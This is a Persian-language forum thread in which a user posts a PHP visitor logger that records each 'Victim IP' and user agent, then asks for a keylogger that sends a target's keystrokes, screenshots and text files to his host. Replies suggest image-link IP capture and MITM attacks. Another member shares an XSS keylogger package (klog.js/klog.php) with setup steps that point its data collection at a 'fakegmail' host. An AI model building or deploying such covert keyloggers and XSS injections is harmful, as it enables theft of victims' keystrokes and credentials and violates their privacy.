رفتن به مطلب

در خواست تکمیل کیلاگر

saher
 اشتراک گذاری

ارسال های توصیه شده

saher Newbie

 saher

ارسال شده در
ارسال شده در

سلام خدمت دوستان عزیز.

 

 من خواستم بدونم میشه این کیلاگر رو جوری کرد که عکس هم بگیره یا تارگت هر چیزی تایپ کنه واسه ما ردش کنه(واسه هاست )

یا اینکه تمامی فایل های .text تارگت رو برامون رد کنه ؟؟

<?php  
function getBrowser() 
{ 
    $u_agent = $_SERVER['HTTP_USER_AGENT']; 
    $bname = 'Unknown'; 
    $platform = 'Unknown'; 
    $version= ""; 
 
    //First get the platform? 
    if (preg_match('/linux/i', $u_agent)) { 
        $platform = 'linux'; 
    } 
    elseif (preg_match('/macintosh|mac os x/i', $u_agent)) { 
        $platform = 'mac'; 
    } 
    elseif (preg_match('/windows|win32/i', $u_agent)) { 
        $platform = 'windows'; 
    } 
    
    // Next get the name of the useragent yes seperately and for good reason 
    if(preg_match('/MSIE/i',$u_agent) && !preg_match('/Opera/i',$u_agent)) 
    { 
        $bname = 'Internet Explorer'; 
        $ub = "MSIE"; 
    } 
    elseif(preg_match('/Firefox/i',$u_agent)) 
    { 
        $bname = 'Mozilla Firefox'; 
        $ub = "Firefox"; 
    } 
    elseif(preg_match('/Chrome/i',$u_agent)) 
    { 
        $bname = 'Google Chrome'; 
        $ub = "Chrome"; 
    } 
    elseif(preg_match('/Safari/i',$u_agent)) 
    { 
        $bname = 'Apple Safari'; 
        $ub = "Safari"; 
    } 
    elseif(preg_match('/Opera/i',$u_agent)) 
    { 
        $bname = 'Opera'; 
        $ub = "Opera"; 
    } 
    elseif(preg_match('/Netscape/i',$u_agent)) 
    { 
        $bname = 'Netscape'; 
        $ub = "Netscape"; 
    } 
    
    // finally get the correct version number 
    $known = array('Version', $ub, 'other'); 
    $pattern = '#(?<browser>' . join('|', $known) . 
    ')[/ ]+(?<version>[0-9.|a-zA-Z.]*)#'; 
    if (!preg_match_all($pattern, $u_agent, $matches)) { 
        // we have no matching number just continue 
    } 
    
    // see how many we have 
    $i = count($matches['browser']); 
    if ($i != 1) { 
        //we will have two since we are not using 'other' argument yet 
        //see if version is before or after the name 
        if (strripos($u_agent,"Version") < strripos($u_agent,$ub)){ 
            $version= $matches['version'][0]; 
        } 
        else { 
            $version= $matches['version'][1]; 
        } 
    } 
    else { 
        $version= $matches['version'][0]; 
    } 
    
    // check if we have a number 
    if ($version==null || $version=="") {$version="?";} 
    
    return array( 
        'userAgent' => $u_agent, 
        'name'      => $bname, 
        'version'   => $version, 
        'platform'  => $platform, 
        'pattern'    => $pattern 
    ); 
} 
 
$ua=getBrowser(); 
$yourbrowser= "\n\rBrowser: " . $ua['name'] . " " . $ua['version'] . " " .$ua['platform']; 
 
$data="Victim IP :".$_SERVER['REMOTE_ADDR']."\n\r User-Agent :".$_SERVER['HTTP_USER_AGENT']."Browser :".$yourbrowser."\n =======================================================\n"; 
$save = fopen('info.txt','a'); 
fwrite($save,$data); 
fclose($save); 
 
 
?>

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
k.shadow Newbie

 k.shadow

ارسال شده در
ارسال شده در

 

سلام خدمت دوستان عزیز.

 

 من خواستم بدونم میشه این کیلاگر رو جوری کرد که عکس هم بگیره یا تارگت هر چیزی تایپ کنه واسه ما ردش کنه(واسه هاست )

یا اینکه تمامی فایل های .text تارگت رو برامون رد کنه ؟؟

<?php  
function getBrowser() 
{ 
    $u_agent = $_SERVER['HTTP_USER_AGENT']; 
    $bname = 'Unknown'; 
    $platform = 'Unknown'; 
    $version= ""; 
 
    //First get the platform? 
    if (preg_match('/linux/i', $u_agent)) { 
        $platform = 'linux'; 
    } 
    elseif (preg_match('/macintosh|mac os x/i', $u_agent)) { 
        $platform = 'mac'; 
    } 
    elseif (preg_match('/windows|win32/i', $u_agent)) { 
        $platform = 'windows'; 
    } 
    
    // Next get the name of the useragent yes seperately and for good reason 
    if(preg_match('/MSIE/i',$u_agent) && !preg_match('/Opera/i',$u_agent)) 
    { 
        $bname = 'Internet Explorer'; 
        $ub = "MSIE"; 
    } 
    elseif(preg_match('/Firefox/i',$u_agent)) 
    { 
        $bname = 'Mozilla Firefox'; 
        $ub = "Firefox"; 
    } 
    elseif(preg_match('/Chrome/i',$u_agent)) 
    { 
        $bname = 'Google Chrome'; 
        $ub = "Chrome"; 
    } 
    elseif(preg_match('/Safari/i',$u_agent)) 
    { 
        $bname = 'Apple Safari'; 
        $ub = "Safari"; 
    } 
    elseif(preg_match('/Opera/i',$u_agent)) 
    { 
        $bname = 'Opera'; 
        $ub = "Opera"; 
    } 
    elseif(preg_match('/Netscape/i',$u_agent)) 
    { 
        $bname = 'Netscape'; 
        $ub = "Netscape"; 
    } 
    
    // finally get the correct version number 
    $known = array('Version', $ub, 'other'); 
    $pattern = '#(?<browser>' . join('|', $known) . 
    ')[/ ]+(?<version>[0-9.|a-zA-Z.]*)#'; 
    if (!preg_match_all($pattern, $u_agent, $matches)) { 
        // we have no matching number just continue 
    } 
    
    // see how many we have 
    $i = count($matches['browser']); 
    if ($i != 1) { 
        //we will have two since we are not using 'other' argument yet 
        //see if version is before or after the name 
        if (strripos($u_agent,"Version") < strripos($u_agent,$ub)){ 
            $version= $matches['version'][0]; 
        } 
        else { 
            $version= $matches['version'][1]; 
        } 
    } 
    else { 
        $version= $matches['version'][0]; 
    } 
    
    // check if we have a number 
    if ($version==null || $version=="") {$version="?";} 
    
    return array( 
        'userAgent' => $u_agent, 
        'name'      => $bname, 
        'version'   => $version, 
        'platform'  => $platform, 
        'pattern'    => $pattern 
    ); 
} 
 
$ua=getBrowser(); 
$yourbrowser= "\n\rBrowser: " . $ua['name'] . " " . $ua['version'] . " " .$ua['platform']; 
 
$data="Victim IP :".$_SERVER['REMOTE_ADDR']."\n\r User-Agent :".$_SERVER['HTTP_USER_AGENT']."Browser :".$yourbrowser."\n =======================================================\n"; 
$save = fopen('info.txt','a'); 
fwrite($save,$data); 
fclose($save); 
 
 
?>

درود

من یک چیزی رو که نفهمیدم این الان کیلاگره ؟؟؟ :huh: :huh:

تا جایی که من فهمیدم هیچ کاری از کارایی که کیلاگر میکنه رو انجام نمیده فقط اطلاعات عادی مثل نام مرورگرو و یوزر ایجنت وپلت فورم رو درمیاره که باید تارگت رو مجبور کنید بره به این پیجتون سربزنه !!! :)

کیلاگر باید سمت کلاینت باشه یعنی بره رو مرورگر تارگت ها ران شه php زبان برنامه نویسی سمت سرور هست شما باید از زبان های برنامه نویسی سمت کلاینت استفاده کنید

مثل

java script

vb script

......

و همچنین اگر میخواید که کیلاگر رو سیستم تارگت ران شه باید برید سراغ ویروس نویسی یا اسکریپت (اکثر مرور گرا جلوی اینجور چیزارو میگیرن)

در ضمن از کیلاگر های اماده استفاده نکنید چون نمیتونید بفهمید با دیتا ها چیکار میکنه نمونه ساده از کیلاگر رو من نوشتم به تاپیک ریختن اسکریپت کیلاگر باباگ xss سربزنید تو امضام هست :D

پیروز باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
saher Newbie

 saher

ارسال شده در
  • مالک
ارسال شده در

ممنون دوست عزیز بابت پاسختون ولی این کیلاگر در اصل برای اینکه ای پی طرف رو به دست بیاری (اگه قبول نداری میتونی تو هاست اپلود کنی و امتحانش کنی)

 

و من میخوام برام عکس و تمامی کلید تای که تایپ میکنه واسم ارسال بشه.ممنون

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
Vendetta Newbie

 Vendetta

ارسال شده در
ارسال شده در

درود به همه دوستان حس میکنم یکم پیچیده کردید مشکل خودتون رو ، بجای یه راه حل سخت از دوتا میانبر آسان استفاده کن...شما میتونی از طریق قرار دادن لینک پشت عکس ip تارگت رو دربیاری یا اگر وبلاگی داری مثلا بگی از فلان پست دیدن کنه که باز هم سرور ip بازدید کننده رو ثبت میکنه و اما برای دیدن عکسا ها و... از طریق ip بدست آورده میتونید از کالی لینوکس و حملات MITM استفاده کنید که آموزشش تو انجمن موجوده... موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
saher Newbie

 saher

ارسال شده در
  • مالک
ارسال شده در

درود به همه دوستان حس میکنم یکم پیچیده کردید مشکل خودتون رو ، بجای یه راه حل سخت از دوتا میانبر آسان استفاده کن...شما میتونی از طریق قرار دادن لینک پشت عکس ip تارگت رو دربیاری یا اگر وبلاگی داری مثلا بگی از فلان پست دیدن کنه که باز هم سرور ip بازدید کننده رو ثبت میکنه و اما برای دیدن عکسا ها و... از طریق ip بدست آورده میتونید از کالی لینوکس و حملات MITM استفاده کنید که آموزشش تو انجمن موجوده... موفق باشید

دوست عزیز ممنون بابت پاسخ.

اصلا بزار اینجوری بگم که یه کیلاگر php میخوام که کلید زده شده کیبورد رو واسه هاست رد کنه (اگه شد این کیلاگر عکس هم بگیره فقط همین)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
k.shadow Newbie

 k.shadow

ارسال شده در
ارسال شده در

ممنون دوست عزیز بابت پاسختون ولی این کیلاگر در اصل برای اینکه ای پی طرف رو به دست بیاری (اگه قبول نداری میتونی تو هاست اپلود کنی و امتحانش کنی)

 

و من میخوام برام عکس و تمامی کلید تای که تایپ میکنه واسم ارسال بشه.ممنون

درود

ببینید من نمیگم باور ندارم که ایپی بدست بیارید اخه ایپی داینامیک چیکار میشه باهش کرد ؟؟

شما اومدید یک صفحه کد php نوشتید که فقط ای پی بگیره !!! :huh: :huh:

در صورتی که با نصف صفحه کد هم میتونید کارتون رو را بندازید

اونم تازه اگه هدف بره و یک صفحه خالی رو باز کنه 

بازم نظر خودتون ولی شما میتونید کیلاگر رو بردارید و این کد هارو بهش اضافه کنید

کلا یک صفحه کد php شما نصف صفحه هم نمیشه بعد به یک post.php وصلش کنید همه رو لاگ کنه

یوزر ایجنت و پلت فورم :

دستور navigator رو برای همین مواقع ساختن :D :D

<script>
//اطلاعات بروزر
var name= navigator.appCodeName;
var version= navigator.appVersion;
var agent=navigator.userAgent;
var platform=navigator.platform;
//اطلاعات کاربر
document.getElementById("name").innerHTML=name;
document.getElementById("version").innerHTML=version;
document.getElementById("platform").innerHTML=platform;
document.getElementById("agent").innerHTML=agent;
</script>

و اکثز جاها برای ایپی از این کد استفاده میکنن

<script type="text/javascript">
    window.onload = function () { 
        var script = document.createElement("script"); 
        script.type = "text/javascript"; 
        script.src = "http://jsonip.appspot.com/?callback=DisplayIP"; 
        document.getElementsByTagName("head")[0].appendChild(script); 
    }; 
    function DisplayIP(response) { 
        document.getElementById("ipaddress").innerHTML = "Your IP Address is " + response.ip; 
    } 
</script>

بازم نظر خودتون :)

اسکرین شات هم با جاوا اسکریپت تا حالا نتونستم بنویسم ولی با c# میشه

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
saher Newbie

 saher

ارسال شده در
  • مالک
ارسال شده در

کارت عالیه اقا علی دمت گرم ولی قضیه ای پی نیست.

 

من یه کیلاگر میخوام که کلید های زده شده (هرچیزی که تایپ کنی ) رو واسه هاست رد کنه و عکس هم بگیره.فقط همین

 

خیلی ممنون

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
k.shadow Newbie

 k.shadow

ارسال شده در
ارسال شده در

درود

ببینید من که گفتم تو امضام هست تو قسمت ریختن اسکریپت کیلاگر توسط باگ xss

بازم براتون اپلود کردم :)

Files.rar

طرز کار هم میشه به این صورت که شما ابتدا فایل های

klog.php

logs.txt

رو اپلود کنید بعد داخل فایل klog.js به جای

http://fakegmail.xzn.ir/klog.php

ادرس klog.php خودتون رو بزنید بعد klog,js رو هم اپلود کنید

بعد میتونید داخل کد های php خودتون ازش استفاده کنید

<script src=""></script>

داخل "" ادرس klog.js خوتونو بزنید

برای اسکرین شات هم من تا به حال نتونستم کدی بنویسم که این کار رو تحت وب بکنه (البته با c# میشه منظورم با java script هست )

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری
رفتن به فهرست موضوع ها

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده

  می پذیرم